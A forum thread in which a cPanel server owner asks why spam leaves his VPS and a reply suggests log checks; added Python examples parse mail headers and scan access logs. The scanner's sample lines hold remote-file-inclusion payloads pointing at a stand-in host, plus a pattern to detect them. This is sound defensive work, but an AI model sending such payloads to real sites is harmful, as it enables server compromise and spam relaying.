  1. #1
    Registered User
    Join Date
    Dec 2009
    Posts
    2

    Spam sent thru my server

    I'm running cPanel 11.25.0-R42213 - WHM 11.25.0 - X 3.9

    I have set up SPF, DomainKeys, RBLs, etc. Yet, I'm getting cases where it appears that spammers are sending spam messages through my server. I definitely don't want to get blacklisted, and I'm only running about six domains under this VPS.

    I have contacted my web host, but they say everything looks good on their end. So I'm a bit stumped. Any suggestions would be much appreciated. I've also checked for rootkits, trojans, etc., to no avail.

    When I try logging in with telnet to port 25 to send an email, if I enter a bogus MAIL FROM, then I get an authentication failed message.


    Here are two emails I received just this morning:


    Fellow abuse team:

    You're receiving this automated email because you appear listed as a contact for one or more of the referenced IP addresses according to cyberabuse.org, your address was composed from the reverse of one or more of the source IP addresses or we otherwise believe you may be related with this incident.

    The sample at the end of this message contains a piece of spam as reported to us by one of our users. As a result, the IP addresses mentioned in the subject of this email might have been included in one or more of our following mail filtering lists:

    abuso.cantv.net/bl/spam
    abuso.cantv.net/bl/dul

    <SNIP>
    Return-Path: <$munged$@$munged$>
    Received: from rs25s1.datacenter.cha.cantv.net (10-128-141-4.ric2.cantv.net [10.128.141.4])
    by rs26s5.mgmt.cantv.net (8.14.3/8.14.3/1.0) with ESMTP id nBBFRxKa023756
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:59 -0430
    X-Virus-Scanned: amavisd-new at cantv.net
    X-DNSBL-MILTER: Passed
    Received: from vps.trinitytechdfw.com (vps.trinitytechdfw.com [92.48.80.173])
    by rs25s1.datacenter.cha.cantv.net (8.14.3/8.14.3/3.0) with SMTP id nBBFRsSE005459
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:58 -0430
    X-Matched-Lists: []
    Received: from kbejpxo (240.229.94.2)
    by vps.trinitytechdfw.com; Fri, 11 Dec 2009 09:37:16 -0600
    Date: Fri, 11 Dec 2009 09:37:16 -0600
    From: Mgrayson68 <$munged$@$munged$>
    X-Mailer: The Bat! (v2.01)
    Reply-To: Mesterwatson <$munged$@$munged$>
    X-Priority: 3 (Normal)
    Message-ID: <$munged$@$munged$>
    To: Miaesmiaes <$munged$@$munged$>
    Subject: 45 Exclusive Hardcore Sites for One Low Price!!!
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="----------ED1B60447069BE"
    X-SPF-Scan-By: smf-spf v2.0.2 - SMFS :: Smart sendMail FilterS for spam and virus filtering
    Received-SPF: None (rs25s1.datacenter.cha.cantv.net: domain of $munged$@$munged$
    does not designate permitted sender hosts)
    receiver=rs25s1.datacenter.cha.cantv.net; client-ip=92.48.80.173;
    envelope-from=<$munged$@$munged$>; helo=vps.trinitytechdfw.com;

    <html>

    And - here's the other:
    This is an email abuse report for an email message with the message-id of 07418507.20090401034329@sympatico.ca received from IP address 92.48.80.173 on Wed, 02 Dec 2009 15:07:43 -0500
    (Message included with subject of "New Exclusive XXX video with Nicole Kidman and other celebs!")
    Last edited by Infopro; 12-21-2009 at 02:27 PM.
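    To make the Received chain in the first abuse report easier to read, here is an added Python example (not from the original post and not cPanel or Exim code) that unfolds the quoted headers, walks the hops newest-first, finds the hop at which the message was accepted by the poster's own host, and reports the client that handed it over together with two defender-side heuristics: whether the hop carries an authenticated-submission marker, and whether it carries the `id` token an MTA writes. The headers are pasted from the post with its $munged$ placeholders; the `esmtpa`/`esmtpsa` protocol names and the `id` check assume an Exim-style MTA (cPanel's default), which is an assumption of this example, not something the post states.

```python
import ipaddress
import re

# Constructed input: the Received chain from the abuse report quoted in the
# first post, with the post's own $munged$ placeholders kept as-is.
SAMPLE_HEADERS = """\
Received: from rs25s1.datacenter.cha.cantv.net (10-128-141-4.ric2.cantv.net [10.128.141.4])
    by rs26s5.mgmt.cantv.net (8.14.3/8.14.3/1.0) with ESMTP id nBBFRxKa023756
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:59 -0430
Received: from vps.trinitytechdfw.com (vps.trinitytechdfw.com [92.48.80.173])
    by rs25s1.datacenter.cha.cantv.net (8.14.3/8.14.3/3.0) with SMTP id nBBFRsSE005459
    for <$munged$@$munged$>; Fri, 11 Dec 2009 10:57:58 -0430
Received: from kbejpxo (240.229.94.2)
    by vps.trinitytechdfw.com; Fri, 11 Dec 2009 09:37:16 -0600
Date: Fri, 11 Dec 2009 09:37:16 -0600
Subject: 45 Exclusive Hardcore Sites for One Low Price!!!
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def unfold(raw):
    """Join RFC 5322 folded header lines (continuations start with whitespace)."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_received(raw):
    """Return the Received hops, newest first, as dicts of their clauses."""
    hops = []
    for line in unfold(raw):
        if not line.lower().startswith("received:"):
            continue
        body = line.split(":", 1)[1].strip()
        m_from = re.search(r"^from\s+(\S+)((?:\s*\([^)]*\))*)", body)
        m_by = re.search(r"\s+by\s+([^\s;]+)", body)
        m_with = re.search(r"\s+with\s+(\S+)", body)
        m_id = re.search(r"\s+id\s+(\S+)", body)
        from_clause = m_from.group(0) if m_from else ""
        ip = IPV4_RE.search(from_clause)  # first literal IPv4 in the from-clause
        hops.append({
            "helo": m_from.group(1) if m_from else None,
            "client_ip": ip.group(1) if ip else None,
            "by": m_by.group(1) if m_by else None,
            "with": m_with.group(1) if m_with else None,
            "mta_id": m_id.group(1) if m_id else None,
            "date": body.rsplit(";", 1)[1].strip() if ";" in body else None,
        })
    return hops


def entry_hop(hops, my_host):
    """The hop where my_host accepted the message, i.e. where it entered the
    server under investigation; hops written by later relays are skipped."""
    for hop in hops:
        if hop["by"] and hop["by"].lower() == my_host.lower():
            return hop
    return None


def assess_entry(hop):
    """Defender-side reading of the entry hop. Assumption of this example: an
    Exim-style MTA stamps authenticated submissions 'with esmtpa'/'esmtpsa'
    and writes an 'id' token into every Received line it generates."""
    proto = (hop["with"] or "").lower()
    ip = hop["client_ip"]
    addr = ipaddress.ip_address(ip) if ip else None
    return {
        "client_ip": ip,
        "helo": hop["helo"],
        "authenticated": proto in ("esmtpa", "esmtpsa"),
        "mta_stamped": hop["mta_id"] is not None,
        "client_ip_reserved": bool(addr and (addr.is_reserved or addr.is_private)),
    }


def analyse(raw, my_host):
    hop = entry_hop(parse_received(raw), my_host)
    return assess_entry(hop) if hop else None


if __name__ == "__main__":
    result = analyse(SAMPLE_HEADERS, "vps.trinitytechdfw.com")
    for key, value in result.items():
        print(f"{key:20} {value}")
```

    Run against the quoted chain, the entry hop into vps.trinitytechdfw.com comes from a bare HELO name with client address 240.229.94.2 (a reserved range), with no authentication marker and no MTA id token. That is consistent either with an unauthenticated SMTP hand-off or with a Received line written by the sending program itself rather than by Exim, which is the locally-run-script case the reply below raises; the Exim log for that timestamp is what decides between the two.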

  2. #2
    Member
    Join Date
    Jul 2004
    Posts
    212

    Hi

    I looked at these logs, and in your case it seems that there are other ways to send spam through your server other than your inner security tweaks.

    For instance, someone can simply sit at a computer and manually start to spam messages, which is very improbable as it would be hard to type all that stuff.

    So he can place a trojan, keylogger or similar directly onto the user's computer

    and can "steal" his email password or use his Outlook Express contacts to send these emails.

    Also, he can infect your server, or more likely another dedicated server, and use a PHP script disguised as an external txt file to spam messages as well.

    So you need to:

    Received: from kbejpxo (240.229.94.2)
    by vps.trinitytechdfw.com; Fri, 11 Dec 2009 09:37:16 -0600
    Check this IP, as it seems to be either the spammer or the complainer.

    If this IP is from the complainer (as the From and To headers are from the same domain, which is always a spammer technique, to use the same From and To headers), then you must discover if it is a PHP nobody message or a hacked account; then you must suspend it.

    In your /etc/httpd/domlogs/, try to grep 'txt?' *.com to see if there are attempts to run external PHP scripts through your server.

    If your PHP is configured with suexec this might not be necessary, as the identity of the PHP script will be revealed in the process list:

    ps -aux

    Did you look at your /var/logs/exim_mainlog?

    regards and good luck
    Claudio
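    To turn the domlogs grep in the reply above into something repeatable, here is an added Python example (not Claudio's code and not part of cPanel) that parses Apache combined-format access-log lines, percent-decodes every query parameter and flags any whose value is a remote URL, which is the "external txt file" pattern `grep 'txt?'` is looking for, generalised so that encoded or differently-named includes are caught too. The log lines are constructed for this example using documentation addresses; `find_remote_includes` takes any iterable of lines, so it can be pointed at a real file under /etc/httpd/domlogs/.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines in Apache combined log format (RFC 5737
# documentation IPs); these are not from the poster's server.
SAMPLE_DOMLOG = """\
203.0.113.5 - - [11/Dec/2009:09:36:58 -0600] "GET /index.php?page=http://198.51.100.7/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.20 - - [11/Dec/2009:09:40:01 -0600] "GET /about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Dec/2009:09:41:13 -0600] "GET /gallery.php?dir=http%3A%2F%2F198.51.100.7%2Flist.txt%3F&sort=asc HTTP/1.1" 200 77 "-" "Mozilla/4.0"
203.0.113.9 - - [11/Dec/2009:09:42:40 -0600] "GET /news.php?id=42&page=2 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_include_params(target):
    """Return (param, value) pairs whose decoded value points at a remote URL.
    parse_qsl percent-decodes, so an encoded 'http%3A%2F%2F' is caught as well
    as the plain form the grep in the reply matches."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(v)]


def find_remote_includes(lines):
    """One record per request that tries to feed a remote URL into a script
    parameter. The HTTP status is kept because a 200 means the script served
    the request, which is the case worth chasing in the process list and the
    Exim log."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        for param, url in remote_include_params(rec["target"]):
            hits.append({
                "ip": rec["ip"], "time": rec["time"], "status": rec["status"],
                "script": rec["target"].split("?", 1)[0],
                "param": param, "url": url,
            })
    return hits


def offenders(hits):
    """Flagged requests per source IP, noisiest client first."""
    return Counter(h["ip"] for h in hits).most_common()


if __name__ == "__main__":
    found = find_remote_includes(SAMPLE_DOMLOG.splitlines())
    for h in found:
        print(f'{h["ip"]} {h["time"]} {h["script"]} {h["param"]}={h["url"]} -> {h["status"]}')
    print("per source:", offenders(found))
```

    On the constructed lines the scan flags two requests from the same client, one of them using a percent-encoded URL that the literal grep would miss, and leaves the ordinary page requests alone. The flagged script, parameter and timestamp are what to line up against the Exim main log and the process list the reply mentions.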
